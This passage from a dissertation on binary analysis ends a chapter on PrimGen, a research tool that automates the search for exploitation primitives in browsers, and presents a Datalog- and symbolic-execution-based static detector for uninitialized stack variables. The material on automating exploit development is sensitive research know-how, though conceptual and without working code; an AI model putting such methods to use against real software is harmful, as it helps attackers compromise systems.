The urge to build automated binary analysis systems that operate at scale and with high efficacy is undeniable. One of the big open limitations is practicality on large, complex applications. Fuzzing has become an attractive and valuable instrument to pinpoint bugs in large binaries and is gaining more and more attention in research [22, 23, 175]. Again, we stress that the intention of our prototype at this point is not to find bugs, but to automate the exploitation step that starts from an attacker-influenced point induced by a vulnerability. Many bug classes are too complex to be exploited in a generic manner; a human expert is still required. In all evaluated case studies, the heap layout plays a key role and might behave non-deterministically. For CVE-2014-0322, PrimGen needs to know how a user-controlled buffer interplays with the heap buffers in order to succeed. Heap spray routines that can be templated and passed to our system require the attacker's knowledge of how the offsets overlap with the native context. These are interesting and challenging problems that we intend to approach in the future.

We argue that supporting and guiding a human expert [126, 183] through the process of exploit development in an automated manner is an important step towards automated exploitation of complex vulnerabilities as they can be found in web browsers. From failure runs of PrimGen we cannot conclude that there is no way to drive execution into an exploitable state. However, complete failure runs indicate a more complex and difficult situation induced by the given VUT, which might not be worth the effort. Note that we do not generate fully weaponized exploits, but extend the attacker's control towards a successful exploit. The full exploits we observed, however, depend on the procedures which PrimGen provides automatically.

4.5 Related Work

The problem of automated exploit generation has been tackled by research in the recent past. In this section, we discuss work closely related to ours. Brumley et al. [29] proposed a method for automatic patch-based exploit generation (APEG), a problem that was previously addressed manually. APEG uses the patched binary to identify vulnerability points and derives the conditions under which it can exploit the unpatched binary. The authors combine a dynamic approach with static analysis by utilizing known inputs that drive the execution close to the target spot and using static slicing to close the gap. We believe that this might integrate well with our path generation procedure by using the dump at the control point. AEG [12] extended this approach and tackled the problems of finding exploitable bugs and automatically generating exploits, mainly for stack-based overflows and format-string vulnerabilities. AEG works solely on source code and introduces preconditioned symbolic execution as a technique to manage the state explosion problem. Mayhem [39] in turn extended AEG to binary code. The system analyzes the binary by performing path exploration until a vulnerable state is reached. It introduced a hybrid symbolic execution approach that alternates between online and offline (concolic) modes of symbolic execution once a memory cap is reached. Mayhem uses several path prioritization heuristics to drive the execution towards paths that most likely contain bugs. Heelan [98] proposed a technique for exploit generation that requires two parameters: a crashing input and shellcode. The crashing input is used on instrumented code to pinpoint and identify a potential vulnerability. Dynamic taint analysis is used to find suitable buffers where the shellcode might fit in. Once the exploit type is determined, the system generates a formula constraining the suitable memory area to the value of the shellcode.
This formula is combined with a formula expressing IP (instruction pointer) control to calculate the path conditions. At the end of the analysis, a final formula expresses the conditions of the exploit. An extension to the problem of finding suitable shellcode buffers was examined by Bao et al. [17]. In particular, the authors tackle the shellcode transplant problem. They present ShellSwap, a tool that modifies the original exploit of a vulnerable program to cope with a new shellcode that carries out different actions desired by the attacker. In many ways, binary analysis can be seen as a search space problem. Recent research has thoroughly explored different strategies to cope with state explosion by minimizing the search space, steering the analysis towards the most promising or interesting areas of the codebase. A recent work by Trabish et al. [199] tackles this problem in a new way. The authors propose Chopped Symbolic Execution, a technique that leverages several on-demand static analyses to determine code fragments which can be excluded. These fragments also include functions that do not touch dependent data and are therefore candidates to be skipped. We follow a similar intention with our ahead-of-time path generation procedure that skips functions not related to any controlled data. Frameworks like Mayhem or AEG that tackle fully automatic generation of exploits are limited to simpler bug classes [182]. However, they set an important stage for future research on more complex cases. This is the stage we aim to tackle with PrimGen, driving research towards more complex scenarios as they can be found in web browsers.

4.6 Conclusion

In this chapter, we demonstrated how to automate a crucial part of the exploitation process: locating reachable exploitation primitives in complex binary code such as modern browsers. In practice, searching and finding such a primitive, analyzing the corresponding program paths, and crafting the fields correctly is a cumbersome, manual task. We demonstrated how all these steps can be automated based on a combination of static and dynamic binary analysis techniques. Based on a vulnerability testcase (VUT), our prototype implementation called PrimGen successfully generates new and previously unknown opportunities that drive the execution into exploitable states in different web browsers. We view this as an important step towards automated exploit generation for modern, complex software systems.

5 Static Detection of Uninitialized Stack Variables in Binary Code

Contents

5.1 Uninitialized Stack Variables
5.2 Design and Approach
5.2.1 Safe Zones
5.2.2 Interprocedural Flow Analysis
5.2.3 Symbolic Execution
5.2.4 Implementation
5.3 Evaluation
5.3.1 CGC Test Corpus
5.3.2 Real-World Binaries
5.4 Discussion
5.5 Related Work
5.6 Conclusion

Memory corruption vulnerabilities are prevalent in programs developed in type-unsafe languages such as C and C++. These types of software faults have been known for many years, and discovering memory corruption bugs in binary executables has received a lot of attention for decades. Nevertheless, it is still an open research problem to efficiently detect vulnerabilities in binary code in an automated and scalable fashion. Especially temporal bugs seem to be a common problem in complex programs, an observation that the steady stream of reported vulnerabilities confirms [61, 60, 59, 193]. In practice, web browsers in particular are often affected by temporal bugs, and these programs suffer from use-after-free vulnerabilities,

race conditions, uninitialized memory corruptions, and similar kinds of software vulnerabilities. One specific challenge is the efficient detection of uninitialized memory errors, such as uninitialized stack variables. While such vulnerabilities have come into the focus of several real-world attacks [57, 58, 61, 56, 32, 96], they still represent an attack vector that is not well studied and often overlooked in practice. The basic principle of such vulnerabilities is straightforward: if a variable is declared but not defined (i.e., not initialized properly) and used later on in a given program, then an attacker may abuse such a software fault as an attack primitive. The uninitialized variable may, for example, contain left-over information from prior variables in stale stack frames used during earlier function calls. This information can be used to disclose memory and leak sensitive information, which can then be used by an attacker to bypass Address Space Layout Randomization (ASLR) or other defenses. In the worst case, an attacker can control the content of an uninitialized variable and use it to execute arbitrary code of her choice, hence fully compromising the program.

Uninitialized memory errors represent a vulnerability class that often affects complex, real-world programs: for example, at the 2016 edition of the annual pwn2own contest, Microsoft's Edge web browser fell victim to an uninitialized stack variable [32]. This vulnerability alone was enough to trigger the memory corruption and gain full control over the whole program. Similarly, an uninitialized structure on the stack was used in the pwn2own contest 2017 to perform a guest-to-host privilege escalation in VMware [96]. The detection of uninitialized variables in an automated way has been studied for software whose source code is available [114, 73, 103].
The need for such systems, especially targeting the stack, is also addressed by recent research through tools like SafeInit [145] or UniSan [134]. These systems set their main focus on prevention and also rely on source code. In practice, however, a lot of popular software is unfortunately proprietary and only available in binary format. Hence, if source code is unavailable, we need to resort to binary analysis. The analysis of binary code, on the other hand, is much more challenging, since context information gets lost during the compilation phase. The loss of data and context information (e.g., names, types, and structures of data are no longer available) hampers analysis, and its reconstruction is difficult [185, 110, 94]. Thus, the development of precise analysis methods is more complicated without this information. Addressing this issue, we are compelled to consider every statement in the assembly code, as it might relate to uninitialized memory of stack variables.

In this chapter, we address this challenge and propose an automated analysis system to statically detect uninitialized stack variables in binary code. Since dynamic analysis methods typically lack comprehensive coverage of all possible paths, we introduce a novel static analysis approach which provides full coverage at the cost of potentially unsound results (i.e., potential false positives and false negatives). However, unveiling potential spots of uninitialized reads while covering the whole binary poses an attractive trade-off, given the high value of detecting novel vulnerabilities. Note that the information obtained by our approach can further serve a dynamic approach, e.g., to automatically verify each warning generated by our method. Our analysis is performed in two phases: a preprocessing phase that lifts binary software to an intermediate language, instruments it, and transforms it into an IR, which is then processed further in a postprocessing phase. We designed a framework that builds on top of Mentalese which, by design, follows this pattern. It lifts binary software into SymIL, which is further transformed into an IR in the form of a knowledgebase that serves our Datalog programs. The declarative logic approach with Datalog, as presented in Chapter 3, enables us to efficiently query the IR that contains facts about the binary code. We use the pointer analysis of Mentalese to gain explicit information on indirect writes and reads that are connected to passed pointers. This allows us to track an indirect read or write back to the specific calling context, where the points-to information is further propagated and incorporated into the IR. This analysis step builds up the conceptual structure on which our dataflow algorithms operate to detect uninitialized variables.

To demonstrate the practical feasibility of the proposed method, we implemented a prototype which is tailored to detect uninitialized stack variables. Our results show that we can successfully find all uninitialized stack vulnerabilities in the Cyber Grand Challenge (CGC) binaries. In addition, we detected several real-world vulnerabilities in complex software such as web browsers and OS kernel binaries. Finally, our prototype is able to detect and pinpoint new and previously unknown bugs as we demonstrate in this chapter.

5.1 Uninitialized Stack Variables

Stack variables are local variables stored in the stack frame of a given function. A function usually allocates a new stack frame during its prologue by decreasing the stack pointer and setting up a new frame pointer that points to the beginning of the frame. Depending on the calling convention, either the caller or the callee frees the stack frame by increasing the stack pointer and restoring the old frame pointer. For example, in the stdcall calling convention, the callee is responsible for cleaning up the stack during the epilogue. It is important to note that data from deallocated stack frames is not automatically overwritten during a function's prologue or epilogue. This, in particular, means that old (and thus stale) data can still be present in a newly allocated stack frame. A stack variable that is not initialized properly hence contains old data from earlier, deallocated stack frames. Such a variable is called uninitialized.

Figure 5.1: Uninitialized use of a stack variable: on the left side the intraprocedural case, on the right side the interprocedural case.

An uninitialized stack variable can lead to undefined behavior, not least due to the unpleasant property that the program does not necessarily crash on such inputs. In practice, uninitialized variables can be exploited in various ways and pose a serious problem [57, 58, 61, 56, 32, 135]. They usually contain junk data, but if an attacker can control these memory cells with data of her choice, the software vulnerability might enable arbitrary code execution. To tackle this problem, the compiler can report uninitialized stack variables at compile time for intraprocedural cases. Unfortunately, interprocedural cases are usually not taken into account by compilers. This lies in the nature of compilers, which need to be fast and cannot afford costly analysis procedures. Even for optimization purposes, past research reveals that the benefits of extensive interprocedural analyses are not large enough to be taken into account by compilers [171].

Figure 5.1 shows a simple example of both cases. On the left-hand side, the intraprocedural case is shown: there are two possible paths inside function f1 which start at the entry and end in z. Variable var1 is initialized at x and used at z. Following the path (entry, y, z), however, var1 is still uninitialized.

In the interprocedural case on the right side, there are two functions, f1 and f2. The dotted lines indicate interprocedural edges. In f1, a pointer to var1 is passed as an argument to f2. The variable var1 is initialized indirectly through the passed pointer at w in f2. Back in f1 at y, var1 is used. By traversing the path (entry_f1, x, entry_f2, k, exit, x, y), we encounter an uninitialized use of var1 at y. While the uninitialized use on the left-hand side is reported by compilers, the example on the right-hand side is not.

5.2 Design and Approach

Our analysis builds on top of Mentalese and is divided into two processing phases, set up in the same pattern as presented in Section 4.2. The preprocessing stage corresponds to the operations performed by the frontend of Mentalese: the binary is lifted into SymIL and transformed into Mental-IR. The IR keeps the SSA nature of SymIL and exposes details about the binary that are summarized in Table 3.1. Based on this IR, we then perform an interprocedural pointer analysis (see Section 3.4.2) to reconstruct information about indirect definitions and uses of stack locations. We use the reconstructed information to determine safe zones for each stack access. These zones consist of safe basic blocks, i.e., blocks in which a use of the specific variable is covered by a definition on all paths. Stack accesses outside their corresponding safe zone produce warnings. For each variable, we determine a safe zone in its corresponding function context. Our dataflow algorithms propagate information about safe zones from callers to callees and vice versa. If a path exists from the entry of a function to the use of a variable which avoids the basic blocks of its safe zone, then the stack access is flagged unsafe. If a potentially uninitialized parameter is passed to a function, we check whether the exit node of the function belongs to its safe zone. This, in particular, means that each path from the entry point of the function to the leaf node is covered by a definition (i.e., initialization) of the variable. We propagate this information back to the call sites, i.e., the fallthrough basic block at the call site is added to the safe zone of the variable in the context of the caller. This information is in turn further propagated and used at other call sites. Figure 5.2 shows the architecture implemented by our prototype. The figure adapts to the design of Mentalese as presented in Figure 3.2.
By design, Mentalese allows attaching different analyses to the system that work on and enrich the same knowledgebase with valuable information. The knowledgebase can be seen as an IR, and its specific design implemented by Mentalese to process binaries is called Mental-IR. New information can enter the knowledgebase either by user input or through other analyses attached to Mentalese.

Figure 5.2: Architecture implemented by our prototype.

This is shown in Figure 5.2 through the IR contribution cycle. Each analysis can contribute to the IR, extend it, and make the analysis process more precise. All analyses adapt to these changes, as this is the nature of the declarative approach; each algorithm can transparently help and interact with the others. Warnings and safe zones are outputs of the analysis phase and put into the IR contribution cycle. A monitor observes changes made to safe zones and warnings to either spawn the Datalog algorithms or a symbolic execution engine. The symbolic execution engine tackles path sensitivity and is fed with the safe zones of each stack variable. Its aim is to reach the warning, i.e., a potential uninitialized read, by avoiding the safe zone of that variable. The whole procedure cycles, i.e., each component contributes to the IR, which in turn is consumed by the other components. Our current prototype is tailored towards uninitialized stack variables. However, as the plugin system suggests, we are able to enrich the analyses with heap information (see § 5.3.2). In the next sections, we explain the individual analysis steps in detail and present examples to illustrate each step.

5.2.1 Safe Zones

In this section, we describe our approach to determine whether a given stack read is safe. With safe we refer to the property that the read is covered by definitions on all paths. Each basic block where a safe read occurs is considered a safe basic block.

Since we are dealing with different memory objects, the set of safe basic blocks differs for each object/variable. More formally, we define it as follows.

Definition 9. Let CFG = (V, E) be the control flow graph, S the set of all stack variables, and let Defs = {(spd, fld, bb_s) | bb_s ∈ V, (spd, fld) ∈ S} be the set of all stack accesses that define the stack location (spd, fld) at bb_s. bb_s is called a safe basic block. Each edge that originates from bb_s is called a safe edge with respect to (spd, fld). Each safe edge is a tuple of the form (spd, fld, bb_s, bb_t) with (bb_s, bb_t) ∈ E. The set of all safe basic blocks with respect to (spd, fld) is called the safe zone of (spd, fld).

Apparently, if all incoming edges to a basic block are safe edges with respect to some variable (spd, fld), then that basic block is a safe basic block for that variable. To determine the safe zone of each variable, we proceed as sketched in Algorithm 5.3. An unsafe read occurs if a path exists that avoids the safe zone, i.e., a path from the entry of the function to the use location which does not go through safe edges. Lines 17-21 generalize this procedure for all stack accesses. If such a path does not exist, we flag the basic block as safe. In essence, the algorithm performs a reaching definitions analysis for each stack variable and labels the basic blocks and edges accordingly. The initial safe zones are built in lines 7-13: from each definition node of a specific stack variable, the information about its definition is propagated further along its paths in the control flow graph. Each stack variable is associated with its own safe zone. Note that we do not use memory SSA, as it introduces conflicts and complicates the pointer analysis. The reason for this stems from 1) a blow-up in the number of expressions, and 2) redundancy at φ-statements for memory expressions that alias each other. Hence, we argue that the benefits of SSA in this setting are marginal and not worth the effort.

Example. Figure 5.4 illustrates the labeling of safe edges. Basic blocks 2 and 3 define variables a and b, respectively. At a stack pointer delta of −x, an access to variable a is possible; its field/offset (fld_a) is zero. For an access to variable b, fld_b is added. The safe zone with respect to (−x, fld_a) consists of basic blocks {2, 3, 4, 5, 6, 7}; for (−x, fld_b) we have {3, 6}. Each use of the respective variable in these basic blocks is considered safe.

 1: Input: CFG = (V, E), Defs, Uses
 2:        DOM (dominator sets)
 3: Output: SafeZone, E′ (SafeEdges)
 4: Let E′ = SafeEdges = {}
 5: Let SafeZone = Defs
 6: Let Vars = ⋃_{(spd, fld, bb) ∈ Defs ∪ Uses} (spd, fld)
 7: for all (spd, fld, bb) ∈ SafeZone do
 8:     E′ = E′ ∪ {(spd, fld, bb, bb_x) | (bb, bb_x) ∈ E}
 9:     for all bb_d ∈ DOM(bb) do
10:         E′ = E′ ∪ {(spd, fld, bb_d, bb_x) | (bb_d, bb_x) ∈ E}
11:         SafeZone = SafeZone ∪ {(spd, fld, bb_d)}
12:     end for
13: end for
14: Let Unsafe = {}
15: for all (spd, fld, bb) ∈ Vars do
16:     if ∃ p = ⟨bb_start, …, bb_i, bb_j, …, bb⟩ with
17:        (spd, fld, bb_i, bb_j) ∉ E′ for all consecutive bb_i, bb_j ∈ p, i ≠ j
18:     then Unsafe = Unsafe ∪ {(spd, fld, bb)}
19:     else SafeZone = SafeZone ∪ {(spd, fld, bb)}
20: end for

Figure 5.3: Sketch: Computation of Safe Zones
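To make the mechanics of the sketch concrete, the following minimal Python sketch implements the semantic criterion behind Figure 5.3 directly: a use is safe if and only if every path from the function entry to the use passes through a block that defines the variable. All names and data structures are illustrative and not part of the actual Mentalese implementation, which expresses this computation in Datalog.

```python
from collections import defaultdict

def compute_safe_zones(E, defs, uses, entry):
    """A use (spd, fld, bb) is safe iff every path from entry to bb goes
    through a block defining (spd, fld); it is unsafe iff a def-avoiding
    path from entry reaches bb."""
    succ = defaultdict(set)
    for s, t in E:
        succ[s].add(t)
    def_blocks = defaultdict(set)
    for spd, fld, bb in defs:
        def_blocks[(spd, fld)].add(bb)
    safe, unsafe = set(), set()
    for spd, fld, bb in uses:
        avoid = def_blocks[(spd, fld)]
        # forward reachability from entry, never entering a defining block
        seen, work = set(), []
        if entry not in avoid:
            seen.add(entry)
            work.append(entry)
        while work:
            n = work.pop()
            for m in succ[n]:
                if m not in avoid and m not in seen:
                    seen.add(m)
                    work.append(m)
        if bb not in avoid and bb in seen:
            unsafe.add((spd, fld, bb))   # some path avoids the safe zone
        else:
            safe.add((spd, fld, bb))     # all paths pass a definition
    return safe, unsafe
```

On the CFG of Figure 5.4, a variable defined on only one branch would be reported unsafe at the join block, while a variable defined on every branch would be safe there.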

5.2.2 Interprocedural Flow Analysis

During data flow analysis, we propagate state information that concerns the initialization of passed arguments between caller and callee. Information about pointers is passed back and forth by the pointer analysis. We use this information to determine indirect accesses. If a leaf node in the callee context is flagged safe with respect to a stack access, we flag the corresponding call sites as safe. This procedure propagates information back to the caller, extending the safe zone in the caller context. In turn, the algorithm of Figure 5.3 needs another run using the new information to distinguish between unsafe and safe accesses to the stack. Previously unsafe accesses might turn into safe accesses through this process. The procedure is repeated until it saturates, i.e., until no changes to the set of safe basic blocks occur.
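The caller/callee saturation described above can be sketched as a small fixpoint loop. Here, `recompute_safe` stands in for a re-run of the labeling of Figure 5.3 with the call sites of known-initializing callees treated as definition sites; all names are hypothetical.

```python
def saturate(call_sites, init_summaries, recompute_safe):
    """call_sites: list of (caller, bb, callee, var), where `var` is a
    caller stack slot passed by pointer.  init_summaries: callees known
    to initialize their argument on every path.  recompute_safe(extra)
    -> (safe_facts, new_summaries): re-runs the intraprocedural labeling
    treating each call site in `extra` as a definition and reports
    callees that thereby become fully initializing."""
    summaries = set(init_summaries)
    while True:
        # call sites of initializing callees act as definition sites
        extra_defs = {(caller, var, bb)
                      for (caller, bb, callee, var) in call_sites
                      if callee in summaries}
        safe_facts, new = recompute_safe(extra_defs)
        if new <= summaries:          # saturated: no new summaries
            return safe_facts, summaries
        summaries |= new
```

A callee that initializes its argument only after another round of propagation is picked up on the next iteration, which mirrors how previously unsafe accesses can turn safe.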

Summaries

A common technique used in interprocedural static analysis is the use of summaries [180]. These summaries can be block summaries, which gather the effects of a basic block, or function summaries, which gather the effects of the whole function

Figure 5.4: Graphical representation of labeling safe edges.

with respect to the variables of interest. Whenever a function call is encountered, these summaries are utilized and applied. The facts in Datalog's EDB and the facts deduced through rules in the IDB can be seen as such summaries. Whenever a function call is encountered, the analysis uses facts about the callee that concern the variables of interest.

Multiple analysis plugins

Mentalese can be extended with new analyses, which can simply be plugged in and out. In Figure 5.2 we present two plugins: an Uninitialized Stack plugin and a Heap Allocator plugin that feeds the pointer analysis with information about heap allocators. All plugins operate on the same knowledge base, and each of them deduces and incorporates knowledge, extending the mental representation of the binary through the IR, hence the name Mental-IR. These changes can transparently be tapped by other plugins and library routines, which, for instance, allows the Uninitialized Stack plugin to operate on information deduced by the Heap Allocator plugin. Each plugin can run in parallel1, and whenever new information enters the cycle to extend the IR, the plugins adapt to it. Each change with respect to warnings and safe zones is monitored.
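The plugin interplay can be pictured as a fixpoint over a shared fact store. The following is a hypothetical Python sketch; the real system delegates this orchestration to the Datalog engine, and all names are illustrative.

```python
class KnowledgeBase:
    """Shared fact store, a stand-in for the Mental-IR/Datalog IDB."""
    def __init__(self):
        self.facts = set()

    def add(self, fact):
        added = fact not in self.facts
        self.facts.add(fact)
        return added

def run_plugins(kb, plugins):
    """Re-run every plugin until no plugin derives a new fact, so each
    plugin transparently adapts to knowledge deduced by the others.
    A plugin is a callable: current facts -> set of derived facts."""
    changed = True
    while changed:
        changed = False
        for plugin in plugins:
            for fact in plugin(kb.facts):
                changed |= kb.add(fact)
    return kb.facts
```

In this picture, a heap-allocator plugin can publish pointer facts that the uninitialized-stack plugin consumes on the next round, without either plugin knowing about the other.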

1This is orchestrated by the Datalog engine of choice.

Detecting Uninitialized Accesses

When the analysis reaches its fixpoint, all information about safe and unsafe zones with respect to all stack accesses is present. A stack access outside its safe zone causes a warning. Additionally, we track each use to its origin, i.e., in the case of a stack pointer, we track it to the call site where the pointer originates from.

5.2.3 Symbolic Execution

So far, we have made the conservative assumption that all paths are executable, which is common practice to simplify the analysis. To improve precision in this regard, we need a mechanism for path-sensitivity in our analysis process. Adapted to our problem, we have to check for each warning whether a satisfiable path to the use of the variable exists that avoids its safe zone. To tackle path-sensitivity, we utilize under-constrained symbolic execution [163], which immensely improves scalability by checking each function directly rather than the whole program. Due to the lacking context before the call of the function under analysis, some register/memory values are unconstrained, hence the term under-constrained. For each variable that caused a warning, we feed the symbolic execution engine with information about its safe zone. Satisfiability is checked from each function where the stack variable originates to the flagged use while avoiding the basic blocks of its safe zone. To improve the scalability of the symbolic execution, we initially skip each function call that does not lead to the target, i.e., each function that is not in the call chain reaching the target function. For instance, if a function f0 needs to reach the target in a function f2 over a function f1, then the call chain is f0, f1, f2. However, f1 might call other functions prior to the call of f2, and these are the functions we initially skip. If a path is satisfiable, we might have an overapproximation, since a skipped function might have made a constraint unsatisfiable. For unsatisfiable paths, we look at the unsat core, i.e., those constraints which have caused the path to become unsatisfiable. A function that alters one of the variables in these constraints is then set free to be processed by the engine, again in a similar fashion, by first skipping calls in the new function context until we eventually reach a satisfiable state.
The only difference is that we now force the engine to run into basic blocks that modify the variables that made our constraints unsatisfiable. As a result, we overapproximate the set of satisfiable paths. Filtered warnings are removed from the Mental-IR.
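The skip-and-refine loop described above can be summarized as follows. Here, `solve` abstracts the under-constrained symbolic execution query (e.g., an angr exploration that avoids the safe-zone blocks), and all names are illustrative.

```python
def filter_warning(solve, initial_skips, funcs_touching):
    """Sketch of the refinement loop: start with all off-chain calls
    skipped; on UNSAT, un-skip any function that writes a variable in
    the unsat core and retry.
    solve(skips) -> ('sat', None) or ('unsat', core_vars)
    funcs_touching(var) -> skipped functions that modify `var`."""
    skips = set(initial_skips)
    while True:
        status, core = solve(frozenset(skips))
        if status == 'sat':
            return True          # a feasible safe-zone-avoiding path exists
        freed = set()
        for var in core:
            freed |= funcs_touching(var) & skips
        if not freed:
            return False         # UNSAT even after freeing: filter warning
        skips -= freed           # force the engine through these callees
```

A warning only survives the filter if the solver eventually reports a satisfiable path; otherwise it is dropped from the Mental-IR.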

5.2.4 Implementation

The implementation is similar to what we have presented in the previous chapter. Our prototype is implemented on top of Mentalese: we retrieve the control flow graph from IDA Pro, transform it into JSON, and feed it into Mentalese. The choice of IDA Pro is one of convenience: it is the gold standard in the field of disassemblers and has been shown to be the most accurate [9], although, by now, the field has been enriched with competitive tools like Binary Ninja and Ghidra. Basically, any of these disassemblers offers an API to extract the CFG in a format that Mentalese can process. We built the symbolic execution on top of Angr [182], a platform-agnostic binary analysis framework. As Figure 5.2 indicates, we plan to attach more engines to our framework. This is motivated by the fact that each engine comes with its advantages and shortcomings, which we hope to compensate by combining different engines. It also seems natural to plug fuzzers into this process.
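The preprocessing step can be illustrated with a small, hypothetical serializer: with IDA Pro, the input dictionary would be populated via its scripting API. The JSON field names below are illustrative rather than the actual Mentalese schema.

```python
import json

def cfg_to_json(funcs):
    """Serialize a reconstructed CFG into a JSON shape that a
    Mentalese-style pipeline could consume.
    funcs: {name: {'entry': addr, 'blocks': {addr: [succ_addrs]}}}"""
    doc = [{'name': name,
            'entry': info['entry'],
            'blocks': [{'addr': addr, 'succs': sorted(succs)}
                       for addr, succs in sorted(info['blocks'].items())]}
           for name, info in sorted(funcs.items())]
    return json.dumps(doc)
```

The same shape can be produced from Binary Ninja or Ghidra, which is what makes the front end interchangeable.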

5.3 Evaluation

In this section, we evaluate the prototype implementation of our analysis framework and discuss empirical results. Note that the analysis framework is by design OS-independent. Our analyses were performed on a machine with Intel Xeon CPUs and 128 GB RAM. The programs presented in Table 5.1 and Table 5.2 are compiled for x86-64. Our prototype is not limited to 64-bit code; it also supports 32-bit binaries.

5.3.1 CGC Test Corpus

As a first step to measure how our approach copes with realistic, real-world scenarios, we evaluated our prototype on a set of Cyber Grand Challenge (CGC) binaries which, in particular, contain a known uninitialized stack vulnerability. These CGC binaries are built to imitate real-world exploit scenarios and deliver enough complexity to stress automated analysis frameworks. Patches of the vulnerabilities ease the effort of finding the states of true positives, and hence these binaries can serve as ground truth for our evaluation. We picked those binaries from the whole CGC corpus that are documented to contain an uninitialized use of a stack variable as an exploit primitive, and we evaluate our prototype with these eight binaries. Table 5.1 shows our results for this CGC test setup. The third column of the table depicts the number of facts extracted from the binary building up the EDB.

The fourth column shows the number of deduced pointer facts. The fifth column depicts the total number of stack accesses. The sixth column denotes the number of potential uninitialized stack variables grouped by their stack pointer delta value and their origin. This approach is similar to fuzzy stack hashing as proposed by Molnar et al. [146] to group together instances of the same bug. For each of the eight binaries, we successfully detected the vulnerability. Each detected use of an uninitialized stack variable is registered, among which some might stem from the same origin. Therefore, we group those warnings by the stack pointer delta values of those stack variables from which they originate. The individual columns of Table 5.1 depict this process in numbers. We double-checked our results with the patched binaries to validate that our analysis process does not produce erroneous warnings for patched cases. For each patched binary, our analysis does not generate a warning for the vulnerabilities anymore.
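The grouping step can be sketched as follows; the warning records and field names are illustrative, not the prototype's actual data model.

```python
from collections import defaultdict

def group_warnings(warnings):
    """Group raw uninitialized-use warnings by the origin function and
    the stack pointer delta of the variable, so repeated sightings of
    the same root cause collapse into one report (akin to fuzzy stack
    hashing)."""
    groups = defaultdict(list)
    for w in warnings:
        groups[(w['origin_func'], w['spd'])].append(w['use_addr'])
    return dict(groups)
```

Two uses that trace back to the same stack slot in the same function then count as one unique warning.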

5.3.2 Real-World Binaries

Beyond the synthetic CGC test cases, we also applied our analysis framework to real-world binaries. Table 5.2 summarizes our results for binutils, gnuplot, and ImageMagick. The numbers are similar to what we have seen for the CGC test cases. The values in parentheses are manually verified bugs. Note that the number of warnings pinpointing the root cause and the potential flaw through an uninitialized variable is small compared to the number of all accesses. For ImageMagick, for instance, our prototype flagged 168 out of 150k stack accesses, two of which are bugs. Additionally, our symbolic execution filter was able to reduce the warning rate by a factor of eight in our experiments. Some user space programs use a variation of malloc for allocating memory dynamically. Performance-critical applications like browsers even come with their own custom memory allocators. To enable tracking of dynamic memory objects, we use a list of known memory allocators, enriching the IR with pointer information. This is exposed by the Heap Allocator plugin (see Section 5.2.2). The pointer analysis grabs this information and deduces new facts. This enables us to observe a coherence between stack locations and the heap. While this is an experimental feature of our prototype, it has proven itself valuable by pinpointing three uninitialized bugs in gprof and objdump. Despite the false positive rates, which we discuss in the next sections, we strongly believe that the output of our prototype is a valuable asset for an analyst and that the time spent to investigate is worth the effort. The numbers are given in column 6 of Table 5.2. Overall, we found two recently reported vulnerabilities in ImageMagick,

two previously unknown bugs in objdump, one unknown bug in gprof, and two bugs in gnuplot. A manual analysis revealed that the bugs in objdump and gprof are not security critical. The two bugs in gnuplot were fixed with the latest patchlevel at the time of writing. Our analysis can also cope with complex programs such as web browsers, interpreters, and even OS kernels in a platform-agnostic manner. We tested our framework on MSHTML (Internet Explorer 8, CVE-2011-1346), Samba (CVE-2015-0240), ntoskrnl.exe (Windows kernel, CVE-2016-0040), PHP (CVE-2016-7480), and Chakra (Microsoft Edge, CVE-2016-0191). In each case, we successfully detected the vulnerability in accordance with the CVE case.

5.4 Discussion

The discovery of vulnerabilities in both the CGC binaries and real-world binaries demonstrates that our approach can successfully detect and pinpoint various kinds of uninitialized memory vulnerabilities. Our analysis is tailored to stack variables, with a design that is well aligned with the intended purpose of a bug-detecting static analysis. However, it also comes with some limitations that are currently not tackled by our prototype; we discuss potential drawbacks of our approach in the following.

Heap

It is well known that analyzing data flow on the heap is harder than data flow on the stack and in registers. To address this problem, Rinetzky and Sagiv, for example, proposed an approach to infer shape predicates for heap objects [172]. More recently, the topic of separation logic has gained more attention as a general-purpose shape analysis tool [170]. This is, among other reasons, due to the fact that aliasing analysis becomes much more difficult for real-world code that makes use of the heap compared to the data flow that arises from stack usage. We account for all stack accesses under the reconstructed CFG. Hence, a stack variable which is initialized through a heap variable is supported by our approach. A points-to analysis needs to account for this interplay. Therefore, we implemented a component that adapts to the given set of points-to facts and tracks heap pointers originating from known heap allocators (see § 5.3.2). This procedure is by design not sound; however, the discovered bugs which originated from the heap were found using this approach. Many performance-critical applications like browsers have their own custom memory allocators, which poses an additional challenge. However, there is work in this field with promising results, as shown in recent research by Chen et al. [42, 43].

Table 5.1: Analysis results for the relevant CGC binaries that contain an uninitialized memory vulnerability.

Binary       Functions   Facts   Pointer Facts   Stack Accesses   Unique Warnings
NOPE         105         57k     568             1378             8
TFTTP        58          30k     175             600              3
Hackman      70          46k     545             943              9
BitBlaster   10          4k      42              95               1
Textsearch   90          50k     290             597              2
SSO          64          26k     204             650              4
MCS          122         156k    860             2498             11
Accel        185         109k    2179            2057             33

Table 5.2: Analysis results for binutils-2.30, ImageMagick-6.0.8, and gnuplot 5.2 patchlevel 4. Numbers in parentheses denote the number of manually verified bugs. [The full table could not be recovered; it lists functions, facts, pointer facts, stack accesses, and unique warnings for ar, size, gprof, cxxfilt, ld-new, strings, readelf, as-new, objdump, gnuplot, and ImageMagick (6.5k functions, 168 (2) unique warnings).]

False Positives/False Negatives: A Question of Soundness

Analyzers come with a set of strategies to handle the number of warnings, for instance, by checking the feasibility of paths, or by not reporting an error at all when there is no guarantee. Each strategy is usually tied to certain aspects of the problem, an approach which we adapted and discussed in the previous sections to tackle false positives. However, we are dealing with many undecidable problems here, e.g., perfect disassembly, and the detection of uninitialized variables is itself undecidable in general. Aggressive compiler optimizations can also pose a burden on the disassembly process, as they can aggravate the problem of unpredictable control flow. Even for a state-of-the-art tool like IDA Pro, control-flow analysis is hampered by unpredictability and indirect jumps. Points-to information can resolve some of these indirect jumps [72]. However, even in the flow-insensitive intraprocedural case, a precise analysis has been shown to be NP-hard [102], given that no dynamic memory allocation is involved. Programs that contain recursion further restrict the capabilities of static analysis, as shown by Reps [167]. A combination with dynamic approaches might prove valuable, and information derived by them can enrich our IR, improving precision in both directions, dynamic and static. A valuable, yet mostly academically emphasized, property of any analyzer is soundness. For a static analysis serving as a bug prevention tool, this usually comes with the obligation to err on the side of caution, i.e., all violations are caught. A fully sound analysis poses a practical dilemma due to code that we cannot analyze (e.g., libraries which are not modeled, or dynamically dispatched code where we might lose sight of the control flow). Furthermore, a sound analyzer needs a perfect disassembly resulting in a perfect CFG, which is an undecidable problem in general.
